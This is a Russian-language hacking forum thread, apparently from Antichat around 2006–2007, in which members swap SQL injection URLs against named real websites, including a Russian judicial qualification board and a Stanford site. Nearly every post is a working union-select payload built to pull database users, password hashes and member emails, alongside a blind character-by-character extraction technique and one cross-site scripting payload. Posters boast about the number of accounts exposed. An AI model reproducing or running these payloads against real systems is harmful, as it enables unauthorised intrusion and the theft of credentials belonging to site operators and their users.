SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.promtractor.ru/products_show.php?section=9&id=75'

    Тракторы =)
     
  2. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://ru-board.com/new/article.php?sid=-99+union+select+1,2,3,concat(user(),' o_O ','preved'),5,6,7,8,9,10/*
    ;)
     
    2 people like this.
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://job.ukr.net/viewvac/view_IDvac.php?vid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,email,password,19,20,21,22,23,24,25,26,27,28,29,30,31+from+members+limit+1000,1/*
    мемберов с пассами не меньше тысячи О_о
     
    3 people like this.
  4. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    http://uvm.edu/theview/article.php?id=-2043+union+select+1,database(),3,4,user(),6,7/*
     
  5. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://daninvest.by/id_3/product.php?id=5555%20union%20select%201,DATABASE(),3,4,5,6,7,8/*

    http://www.advance-acoustic.com/fr-product.php?id=-4%20union%20select%201,2,3,4,DATABASE(),6,7,3,8,9,10/*

    http://www.puppetshowbooks.com/product.php?id=-5'

    http://www.standard.md/product.php?l=ro&id=-5'%20union%20select%201,table_name%20from+INFORMATION_SCHEMA.TABLES+limit+3,4/*
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.clasp.org/publications.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    PHP:
    http://www.worstpreviews.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Code:
    http://www.karlcore.com/articles/article.php?id=-1+union+select+1,2,USER(),4,VERSION(),6/*
     
    1 person likes this.
  9. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.splav.kharkov.com/mat_start.php?name_id=-1+union+select+CHAR(207,208,197,194,197,196,32,204,197,196,194,197,196,33)/*

    СтЭнфорд ))
    http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,password,17,18,19+from+mysql.user/*

    http://atvmarket.ru/select.php?cat=-1+union+select+version(),3/*


    http://www.ecoross.ru/persons.php?name_id=-1+union+select+user(),2,CHAR(198,232,240,232,237,238,226,241,234,232,233,32),4,5,6,7,8,9,10,11,12,13,14/*

    http://mir-tech.ru/group.php?cat=-1+union+select+CHAR(193,229,199,239,192,237,210,238,194,251,201,32,204,224,195,224,199,232,205,33)/*

    http://fanats.ru/?n_id=-1+union+select+1,2,email,555,5+from+user+limit+3,3/*


    http://www.websib.ru/new_detail.php?new_id=-1+union+select+user,password,1+from+mysql.user/*
     
    #229 *D1VER, 8 Jan 2007
    Last edited: 9 Jan 2007
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://bbq-grilling-recipes.com/recipe.php?recipeid=-1+union+select+0,concat(userid,0x3a,login,0x3a,password,0x3a,email)+from+users+limit+1,1/*


    ps это двиг.
    /siteadmin/addad.php?groupid=4
     
    #230 guest3297, 9 Jan 2007
    Last edited: 9 Jan 2007
    1 person likes this.
  11. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATABASE(),USER(),9/*
    помогите с table informations =(
     
  12. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),passwd,char(58),PasswordSalt),4,5+from+smf_members/*
    A-ONE
     
    1 person likes this.
  13. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,null,null,null,null/* Вот только обидно не выводится не чего из таблици;(

    P.S. просто из-за внемательности
    вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!
     
    #233 DIAgen, 9 Jan 2007
    Last edited: 9 Jan 2007
    1 person likes this.
  14. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    перебирай
    http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>1)
    http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>100)
     
    _________________________
    3 people like this.
  15. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html
     
  16. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    Правда не чего интересно!
     
    1 person likes this.
  17. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password)using%20cp1251),2+from+mysql.user/*
    Высшая квалификационная коллегия судей
    Российской Федерации :D
     
    2 people like this.
  18. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://www.ugd-soft.ru/?mode=press&id=-1+union+select+1,2,3,4/*
     
    1 person likes this.
  19. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.worthplaying.com/article.php?sid=-1+union+select+1,2,pass,4,name,6,7,111+from+users/*

    Чють Чють не ф тему но там же
    http://www.worthplaying.com/user.php?op=userinfo&uname=7'%3Cscript%3Ealert()%3C/script%3E
     
    #239 *D1VER, 10 Jan 2007
    Last edited: 10 Jan 2007
  20. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    2Diagen почему же =) можно поля поискать.. не зря таблица юзеры называется..

    + раньше был локал инклуд .. сейчас хз

    http://keep4u.ru/album.php?view=-1'+union+select+1,2,convert(user()+using+cp1251),4+from+users/*
     
Thread Status:
Not open for further replies.